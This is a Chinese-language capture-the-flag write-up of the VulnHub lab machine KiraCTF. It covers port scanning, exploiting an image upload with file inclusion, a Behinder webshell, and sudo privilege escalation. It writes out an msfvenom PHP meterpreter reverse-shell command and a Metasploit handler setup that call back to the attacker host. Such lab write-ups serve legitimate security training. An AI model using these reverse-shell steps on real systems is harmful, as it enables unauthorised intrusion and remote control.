0%

VulnHub打穿记录之KiraCTF

vlunhub系列继续搞起来,KiraCTF虚拟机不是很难,由于是2020年11月4日发布的,网上还没有教程。同时比较简单,主要是文件包含漏洞的利用。正文如下:

一、实验环境
版本 IP
漏洞服务器 KiraCTF 192.168.42.128
攻击机 Kali 2020.4 192.168.42.129
二、实验步骤
(一)信息搜集

瑞士军刀利器nmap,扫描漏洞主机的IP以及开放的服务。

1
2
3
──(leyan㉿bogon)-[~/Desktop]
└─$ nmap -sV -p- 192.168.42.1/24

扫描结果

扫描我们发现,漏洞主机IP为:192.168.42.128,仅仅开放了80端口。通过访问80端口,发现是一个文件上传的页面。

首页截图

(二) 漏洞分析

通过分析发现此处为上传和包含的漏洞的综合利用。将php可执行命令写入图片中,然后利用包含漏洞执行命令。此时,拿出珍藏已久的burp suite工具,上传包含命令的图片。

图片上传

访问上传的图片。

执行结果

发现在网站根目录有一个supersecret-for-aziz文件夹,发现该文件夹发现bassam的密码。

bassam

bassam密码

(三)木马上传

该漏洞服务器仅开放了80端口,没有开放22端口,无法通过ssh进行链接。这里不要放弃,还可以通过shell反弹方式进行链接。这里针对该漏洞机器记录两种方式。

第一种,通过冰蝎进行木马链接反弹。这里冰蝎一定要使用最新版本(小编使用的是v3.0 beta),其他版本可能无法解析图片木马。

冰蝎木马上传

冰蝎成功连接

冰蝎反连mateploit

第二种,通过生成mateploit的php木马,进行链接。同时冰蝎也可以将shell反弹至mateploit控制台。

mateploit生成php木马

1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.42.129 lport=6666 > she.php

设置metasploit

1
2
3
4
5
6
7
8
9
10
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.42.129
lhost => 192.168.42.129
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > run

连接结果

设置交互shell

1
python3 -c 'import pty; pty.spawn("/bin/bash")'

登录bassam账号

登录bassam

通过简单的搜索获取user.txt 文件内容

获取user.txt

(三)提权root

目前linux提权有:
1、脏牛提权-需要系统的内核版本在可提权版本内

2、利用地权限用户下可被root用户调用的脚本提权

3、利用环境变量劫持高权限程序提权

由于bassam账号可以执行sudo下的命令,因此这里使用第二种方式提权,提权命令在这里查询。

提权命令

在bassam账号的基础上执行提权命令。获取root权限后,在root目录中找到flag。
获取root权限

获取flag

三、反思

1、文件包含漏洞和上传漏洞结合

2、图片木马制作

3、Linux提权